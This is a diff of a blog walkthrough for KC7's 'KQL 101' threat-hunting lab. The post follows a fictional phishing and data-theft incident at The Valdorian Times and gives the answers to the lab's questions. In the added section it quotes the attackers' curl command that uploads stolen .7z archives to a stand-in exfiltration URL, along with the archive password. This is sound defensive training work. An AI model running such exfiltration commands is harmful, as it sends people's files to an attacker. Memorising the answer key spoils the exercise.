Almost Finished KQL 101

--- a/_posts/KC7/KQL 101/2025-07-18-KQL101.md
+++ b/_posts/KC7/KQL 101/2025-07-18-KQL101.md
@@ -43,7 +43,7 @@ The **KQL 101** section is a great primer for new threat hunters or SOC analysts
 
 ---
 
-## Intro: Welcome to Valdoria!
+## KQL 101 Intro: Welcome to Valdoria!
 
 On the eve of the election, Nene Leaks, the esteemed editor of The Valdorian Times, awoke to a nightmare. The Valdorian Times, the beacon of truth for the city, published a scandalous article accusing Luffy of corruption and misconduct. The article, a vile concoction of lies, was not what she had approved.
 
@@ -209,6 +209,8 @@ She doesn't recall getting any unusual emails or any other weird activity on her
 `yes`
 
 ---
+
+## Section 3: Plenty of Phish
 
 You stop by The Valdorian Times office and meet with some staff. After the meeting, one employee, Sonia Gose, comes up to you and says she may have something that can help with your investigation.
 
@@ -412,6 +414,8 @@ Maybe the attackers weren't interested in Sonia…
 
 ---
 
+## Section 4: A Scandal
+
 We can apply what we've learned by investigating the activity affecting Sonia to find other victims of this incident.
 
 I hope you took good notes. Another suspicious email address valdorias_best_recruiter@gmail.com was seen sending emails to intern Ronnie and a few others.
@@ -520,3 +524,156 @@ Your investigative buddy, who was also looking at Ronnie's machine, saw a weird 
 Let's see if we can find evidence of this download in OutboundNetworkEvents.
 
 #### What is Ronnie's IP address?
+
+![Desktop View](/assets/img/KQL101/35.png){: width="700" height="400" }
+
+---
+
+#### What is the full URL fakestory.docx was downloaded from?
+
+`https://hire-recruit.org/files/fakescandal/2024/fakestory.docx`
+
+---
+
+It does look like someone downloaded fakestory.docx to Ronnie's machine. Let's see if we can find that file on disk.
+
+#### What is Ronnie's hostname?
+
+`A37A-DESKTOP`
+
+---
+
+#### What is the sha256 hash of fakestory.docx on Ronnie's machine?
+
+`5f8a7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f`
+
+![Desktop View](/assets/img/KQL101/36.png){: width="700" height="400" }
+
+---
+
+#### When was fakestory.docx created on Ronnie's machine?
+
+`1/31/2024, 9:47:51 AM`
+
+---
+
+Ronnie doesn't recall ever seeing that file or visiting that domain. It seems that this file download is evidence of hands-on-keyboard activity from the attackers.
+
+Let's see what the attackers did after they downloaded fakestory.docx by looking at ProcessEvents for Ronnie's machine.
+
+After downloading fakestory.docx, the attackers ran a command to rename and move the file to a different location.
+
+#### What is the new path for the document?
+
+`C:\Users\romclovin\Documents\OpEdFinal_to_print.docx`
+
+![Desktop View](/assets/img/KQL101/37.png){: width="700" height="400" }
+
+---
+
+#### When was this command executed to rename and move the file?
+
+`1/31/2024, 10:26:20 AM`
+
+---
+
+OpEdFinal… that seems familiar.
+
+Wait a minute, that's the same file name you saw when you looked in the email logs to find Ronnie sending the draft to Clark Kent. Is it possible that the attacker used Ronnie's email to send this file to Clark?
+
+#### When was OpEdFinal_to_print.docx emailed from Ronnie's account to Clark Kent?
+
+`1/31/2024, 11:11:12 AM`
+
+![Desktop View](/assets/img/KQL101/38.png){: width="700" height="400" }
+
+---
+
+#### How many minutes elapsed between when the file was moved/renamed on Ronnie machine and when the email was sent to Clark Kent?
+
+`44`
+
+---
+
+#### What was the subject line of this email?
+
+`URGENT: Final OpEd Draft Edits (Please publish the following article in tomorrow's paper))`
+
+Wow! So it looks like the attackers downloaded the fake story, renamed it OpEdFinal_to_print.docx, and then sent the file to Clark Kent using Ronnie's email!
+
+#### Do you think this is the only thing the attackers did on Ronnie's machine? (yes/no)
+
+`no`
+
+---
+
+In the middle of your investigation, Ronnie finds you and shows you an alert she received from her dark web monitoring service.
+
+![Desktop View](/assets/img/KQL101/39.png){: width="700" height="400" }
+
+#### What is the domain mentioned in this alert?
+
+`hirerecruit.com`
+
+Oh no! It looks like someone may have stolen Ronnie's memes from her machine! Let's see if we can find evidence of the attackers stealing any data.
+
+We can timebound our analysis to find other actions that ocurred around the same time by using this query:
+
+#### How many total commands were run in this timeframe?
+
+![Desktop View](/assets/img/KQL101/40.png){: width="700" height="400" }
+
+`2`
+
+---
+
+Right after renaming fakestory.docx to OpEdFinal_to_print.docx, the attackers ran commands to steal (exfiltrate) data from Ronnie's machine.
+
+One command the attackers ran leveraged 7zip to compress all of Ronnie's dank memes into a .7z file.
+
+#### What is the name of the .7z file that contains the stolen memes?
+
+![Desktop View](/assets/img/KQL101/41.png){: width="700" height="400" }
+
+`DankMemes.7z`
+
+---
+
+#### What is the name of the .7z file that contains files stolen from Ronnie's Documents folder?
+
+`MyStolenDataFromDocuments.7z`
+
+---
+
+#### What is the name of the .7z file that contains files stolen from Ronnie's Desktop folder?
+
+`MyStolenDataFromDesktop.7z`
+
+---
+
+#### What is the password the attackers used to encrypt all of the .7z files?
+
+`thruthW!llS3tUfree`
+
+---
+
+After compressing all the stolen data into .7z files, the attackers exfiltrated the data by uploading it to a custom portal on their website.
+
+#### What is the full command the attackers ran to do this?
+
+`curl -F "file=@C:\Users\romclovin\Documents\*.7z" https://hirejob.com/exfil_processor/upload.php`
+
+---
+
+#### What domain was the stolen data uploaded to?
+
+`hirejob.com`
+
+---
+
+Query ProcessEvents for all devices at Valdorian Times.
+
+#### Was data stolen from any other devices and uploaded to hirejob.com? (yes/no)
+
+
+
